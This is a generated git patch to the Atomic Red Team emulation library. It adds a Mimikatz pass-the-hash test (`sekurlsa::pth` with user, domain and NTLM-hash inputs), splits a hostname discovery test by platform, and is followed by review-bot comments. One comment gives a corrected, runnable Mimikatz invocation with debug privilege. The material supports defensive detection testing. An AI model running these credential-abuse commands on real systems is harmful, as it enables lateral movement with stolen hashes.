From 0954cf3e578d0edb73046bb33e7134ff5054ac35 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 25 Nov 2019 17:06:20 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1075/T1075.md | 30 ++++++++++++++++++++++++++++-- atomics/T1082/T1082.md | 30 ++++++++++++++++++++++++------ atomics/index.md | 8 +++++--- atomics/index.yaml | 39 +++++++++++++++++++++++++++++++++++++-- atomics/linux-index.md | 2 +- atomics/macos-index.md | 2 +- atomics/windows-index.md | 7 ++++--- 7 files changed, 100 insertions(+), 18 deletions(-) diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md index f9f1cf91..7055a261 100644 --- a/atomics/T1075/T1075.md +++ b/atomics/T1075/T1075.md @@ -6,12 +6,38 @@ Windows 7 and higher with KB2871997 require valid domain user credentials or RID ## Atomic Tests -- [Atomic Test #1 - crackmapexec Pass the Hash](#atomic-test-1---crackmapexec-pass-the-hash) +- [Atomic Test #1 - Mimikatz Pass the Hash](#atomic-test-1---mimikatz-pass-the-hash) + +- [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash)
-## Atomic Test #1 - crackmapexec Pass the Hash +## Atomic Test #1 - Mimikatz Pass the Hash +Note: must dump hashes first +[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user_name | username | string | Administrator| +| domain | domain | string | atomic.local| +| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| + +#### Run it with `command_prompt`! +``` +mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} +``` + + + +
+
+ +## Atomic Test #2 - crackmapexec Pass the Hash command execute with crackmapexec **Supported Platforms:** Windows diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 824cfe01..04a5650e 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -34,9 +34,11 @@ In Azure, the API request GET https://management.azure.com/subscriptions/{ - [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules) -- [Atomic Test #6 - Hostname Discovery](#atomic-test-6---hostname-discovery) +- [Atomic Test #6 - Hostname Discovery (Windows)](#atomic-test-6---hostname-discovery-windows) -- [Atomic Test #7 - Windows MachineGUID Discovery](#atomic-test-7---windows-machineguid-discovery) +- [Atomic Test #7 - Hostname Discovery](#atomic-test-7---hostname-discovery) + +- [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery)
@@ -139,10 +141,26 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"

-## Atomic Test #6 - Hostname Discovery -Identify system hostname for Windows, Linux, and macOS systems. +## Atomic Test #6 - Hostname Discovery (Windows) +Identify system hostname for Windows. -**Supported Platforms:** Windows, Linux, macOS +**Supported Platforms:** Windows + + +#### Run it with `command_prompt`! +``` +hostname +``` + + + +
+
+ +## Atomic Test #7 - Hostname Discovery +Identify system hostname for Linux and macOS systems. + +**Supported Platforms:** Linux, macOS #### Run it with `bash`! @@ -155,7 +173,7 @@ hostname

-## Atomic Test #7 - Windows MachineGUID Discovery +## Atomic Test #8 - Windows MachineGUID Discovery Identify the Windows MachineGUID value for a system. **Supported Platforms:** Windows diff --git a/atomics/index.md b/atomics/index.md index bb0ca6ef..46cceadd 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -601,8 +601,9 @@ - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - - Atomic Test #6: Hostname Discovery [windows, linux, macos] - - Atomic Test #7: Windows MachineGUID Discovery [windows] + - Atomic Test #6: Hostname Discovery (Windows) [windows] + - Atomic Test #7: Hostname Discovery [linux, macos] + - Atomic Test #8: Windows MachineGUID Discovery [windows] - [T1016 System Network Configuration Discovery](./T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery [windows] - Atomic Test #2: List Windows Firewall Rules [windows] @@ -814,7 +815,8 @@ - Atomic Test #3: Scheduled Task Startup Script [windows] - Atomic Test #4: Logon Scripts - Mac [macos] - [T1075 Pass the Hash](./T1075/T1075.md) - - Atomic Test #1: crackmapexec Pass the Hash [windows] + - Atomic Test #1: Mimikatz Pass the Hash [windows] + - Atomic Test #2: crackmapexec Pass the Hash [windows] - [T1097 Pass the Ticket](./T1097/T1097.md) - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - [T1076 Remote Desktop Protocol](./T1076/T1076.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index 7e21c885..d4c5dd17 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -17312,12 +17312,23 @@ discovery: sudo lsmod | grep -i "xen-vbd\|xen-vnif" sudo lsmod | grep -i "virtio_pci\|virtio_net" sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" - - name: Hostname Discovery - description: 'Identify system hostname for Windows, Linux, and macOS systems. + - name: Hostname Discovery (Windows) + description: 'Identify system hostname for Windows. ' supported_platforms: - windows + executor: + name: command_prompt + elevation_required: false + command: 'hostname + +' + - name: Hostname Discovery + description: 'Identify system hostname for Linux and macOS systems. + +' + supported_platforms: - linux - macos executor: @@ -23303,6 +23314,30 @@ lateral-movement: modified: '2019-07-18T16:56:39.990Z' identifier: T1075 atomic_tests: + - name: Mimikatz Pass the Hash + description: | + Note: must dump hashes first + [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + supported_platforms: + - windows + input_arguments: + user_name: + description: username + type: string + default: Administrator + domain: + description: domain + type: string + default: atomic.local + ntlm: + description: ntlm hash + type: string + default: cc36cf7a8514893efccd3324464tkg1a + executor: + name: command_prompt + command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} + +' - name: crackmapexec Pass the Hash description: 'command execute with crackmapexec diff --git a/atomics/linux-index.md b/atomics/linux-index.md index 983df1b2..7335a0eb 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md 
@@ -102,7 +102,7 @@ - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - - Atomic Test #6: Hostname Discovery [windows, linux, macos] + - Atomic Test #7: Hostname Discovery [linux, macos] - [T1016 System Network Configuration Discovery](./T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] - [T1049 System Network Connections Discovery](./T1049/T1049.md) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 159d4f3a..a1dd050c 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -114,7 +114,7 @@ - [T1082 System Information Discovery](./T1082/T1082.md) - Atomic Test #2: System Information Discovery [linux, macos] - Atomic Test #3: List OS Information [linux, macos] - - Atomic Test #6: Hostname Discovery [windows, linux, macos] + - Atomic Test #7: Hostname Discovery [linux, macos] - [T1016 System Network Configuration Discovery](./T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] - [T1049 System Network Connections Discovery](./T1049/T1049.md) diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 12463482..de04006b 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -422,8 +422,8 @@ - Atomic Test #1: Find and Display Iinternet Explorer Browser Version [windows] - [T1082 System Information Discovery](./T1082/T1082.md) - Atomic Test #1: System Information Discovery [windows] - - Atomic Test #6: Hostname Discovery [windows, linux, macos] - - Atomic Test #7: Windows MachineGUID Discovery [windows] + - Atomic Test #6: Hostname Discovery (Windows) [windows] + - Atomic Test #8: Windows MachineGUID Discovery [windows] - [T1016 System Network Configuration Discovery](./T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery [windows] - Atomic Test #2: List Windows Firewall Rules [windows] 
@@ -496,7 +496,8 @@ - Atomic Test #2: Starup Folder Script [windows] - Atomic Test #3: Scheduled Task Startup Script [windows] - [T1075 Pass the Hash](./T1075/T1075.md) - - Atomic Test #1: crackmapexec Pass the Hash [windows] + - Atomic Test #1: Mimikatz Pass the Hash [windows] + - Atomic Test #2: crackmapexec Pass the Hash [windows] - [T1097 Pass the Ticket](./T1097/T1097.md) - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - [T1076 Remote Desktop Protocol](./T1076/T1076.md)
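Review bot: in the T1075.md hunk (`@@ -6,12 +6,38 @@`) the new Mimikatz test's command, `mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}`, is the interactive mimikatz prompt pasted verbatim and will not run under the `command_prompt` executor: cmd.exe would look for an executable named `mimikatz` and hand it `#` and the remaining tokens as separate arguments. Pass the module command as a quoted argument to the binary instead, with the debug privilege that `sekurlsa::pth` needs, e.g. `mimikatz.exe "privilege::debug" "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" "exit"`, and make the mimikatz path an input argument rather than assuming it is on PATH. The default `ntlm` value `cc36cf7a8514893efccd3324464tkg1a` is also not a valid NT hash (it contains `t`, `k` and `g`; an NT hash is 32 hex characters), so the test fails at argument parsing whenever the operator forgets to override it; use a 32-character hex placeholder. The free-text "must dump hashes first" note belongs in a prerequisite or dependency block, where the runner can check it, not in the description.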
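Review bot: in the index.yaml hunk for T1075 (`@@ -23303,6 +23314,30 @@`) the Mimikatz executor carries no `elevation_required` field, while the hostname executor added in the same patch sets `elevation_required: false`. `sekurlsa::pth` reads and patches LSASS memory and needs debug privilege, so this entry should be `elevation_required: true`; without it the runner will attempt the test from an unprivileged prompt and report a failure that has nothing to do with pass-the-hash. The same entry repeats the prompt-prefixed `mimikatz # sekurlsa::pth ...` command and the non-hex `ntlm` default from T1075.md, and since the subject line says these files are generated, both need fixing in the technique's source YAML rather than in index.yaml or the markdown, or the next generator run will reintroduce them.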
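Review bot: the T1082.md TOC hunk (`@@ -34,9 +34,11 @@`) inserts "Hostname Discovery (Windows)" as test #6 ahead of the existing tests, which renumbers the Linux/macOS hostname test to #7 and "Windows MachineGUID Discovery" to #8; the T1075.md hunk does the same, displacing "crackmapexec Pass the Hash" from #1 to #2. Test numbers are the handle by which the index pages link (`#atomic-test-7---windows-machineguid-discovery` now points at a different test) and by which existing automation selects a test to run, so prepending silently changes what a stored number refers to. Append new tests after the existing ones unless a renumber is intended, and if it is intended, say so in the commit message instead of the generic generator subject.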
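Review bot: the T1082.md hunk that splits the hostname test (`@@ -139,10 +141,26 @@`) leaves the two names asymmetric: the Windows test becomes "Hostname Discovery (Windows)" but the Linux/macOS test keeps the bare "Hostname Discovery", which in every index listing reads as though it were still the cross-platform test it replaced. Rename it along the lines of "Hostname Discovery (Linux, macOS)" so the platform is visible in the name, not only in the `Supported Platforms` line.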
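Review bot: the context lines around the first windows-index.md hunk (`@@ -422,8 +422,8 @@`) show the generator faithfully reproducing two typos from the atomic source, "Find and Display Iinternet Explorer Browser Version" and, in the second windows-index.md hunk, "Starup Folder Script". They are not introduced by this patch, but since the index files are generated, the fix is a one-word change to each test's `name` in its technique YAML, after which the next generator run corrects all four index files at once.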